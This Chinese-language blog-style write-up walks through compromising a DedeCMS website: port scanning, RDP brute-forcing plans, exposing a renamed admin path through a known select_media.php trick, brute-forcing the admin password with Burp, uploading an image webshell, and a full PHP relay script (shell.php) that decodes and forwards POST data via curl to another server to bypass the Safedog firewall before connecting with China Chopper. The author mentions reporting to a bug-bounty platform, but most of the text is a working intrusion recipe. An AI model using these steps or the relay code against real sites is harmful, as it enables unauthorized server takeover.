一、信息收集
首先对网站的信息进行判断,可以很明显的判断出来是dedecms(织梦)
鉴于织梦的漏洞比较多,我们先对网站的信息进行一下收集,再进行下一步的操作。在这里我们可以判断网站使用了安全狗的防护。
我们再去站长平台来对网站进行一次检测,我们可以看到网站的IP地址,并且判断出来是个本地的服务器。
再回到网站,我们随便点开一篇文章,看到页脚作者信息,不出所料admin,此时,心里面应该有数了,后台管理员账户就是admin,就差找到后台地址了,hiahia~
有了这些还觉得太少,于时丢进nmap对主机一顿扫,看到了开放的这几个端口:
23/tcp open telnet
80/tcp open http
1935/tcp open rtmp
3389/tcp open ms-wbt-server
看到3389长叹一口气,应该可以确定是win的服务器了。使用远程桌面连接了一下IP试试,没得跑。
二、利用过程
方案一:有了IP地址和3389的信息,我们可以用hydra来对3389进行一下爆破,可以用网页下面的信息,和域名的注册信息,在这里看到还有几个子站,应该是委托搭建的。
方案二:织梦cms通用后台都是/dede,但是显然这个管理员已经更改了后台地址,但是丝毫不慌,我们只需要稍微的变动一下,就会有办法,只要思想不滑坡,办法总比困难多。我们把地址改为:http://xxxx.com/include/dialog/select_media.php?f=form1.murl即可看到以下画面:
或者使用扫描软件对网站进行一波扫描,也是同样可以的。
进入到后台地址之后,发现后台连个验证码都没有,鉴于前面已经知道了网站管理员的账号,于时我们就请出大宝剑burp,一阵梭哈之后,就get到了后台管理员的密码,对于字典的生成,可以去找个字典平台,把收集到的网站信息田间去,自动生成字典,我这边使用的是常用100密码,鉴于管理员的安全意识较差,我就直接进♂来了。
后台有图片上传接口,上传图片马不会拦截,因为有安全狗,所以需要绕过一下,因为某些原因,后面的过程就简单概括以下,通过本地搭建web服务,把eval数据进行base64加密,创建一个跳板,跳过小狗。
创建shell.php
<?php
$target="<a rel="external nofollow" href="192.168.1.3/install/shell.php";>";
$poststr='';
$i=0;
foreach($_POST as $k=>$v)
{
if(strstr($v, "base64_decode"))
{
$v=str_replace("base64_decode(","",$v);
$v=str_replace("))",")",$v);
}
else
{
if($k==="z0")
$v=base64_decode($v);
}
$pp=$k."=".urlencode($v);
//echo($pp);
if($i!=0)
{
$poststr=$poststr."&".$pp;
}
else
{
$poststr=$pp;
}
$i=$i+1;
}
$ch = curl_init();
$curl_url = $target."?".$_SERVER['QUERY_STRING'];
curl_setopt($ch, CURLOPT_URL, $curl_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $poststr);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
echo $result;
?>
之后菜刀直连getshell,一顿梭哈之后,上传补天。
刚入门安全,文章技术性不是很高,欢迎各位大佬前来吐槽,大家一起交♂流学习!